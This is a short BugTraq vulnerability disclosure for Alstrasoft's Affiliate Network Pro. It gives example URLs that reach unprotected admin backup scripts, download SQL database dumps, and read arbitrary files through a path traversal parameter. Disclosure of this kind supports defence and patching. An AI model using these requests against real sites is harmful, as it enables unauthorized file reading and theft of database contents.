BugTraq
Affiliate Network Pro Multiple Input Validation and Local file inclusion Sep 29 2007 04:23PM
hack2prison yahoo com
Discovered by hack2prison and navaro - VNBRAIN.NET member
Vendor: Alstrasoft
http://site/path/admin/backupstart.php
http://site/path/admin/admin/dump/backup-dd-mm-yyyy.sql
http://site/path/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
http://site/path/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
http://site/path/admin/downloadbackup.php?fl=../path/filename

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus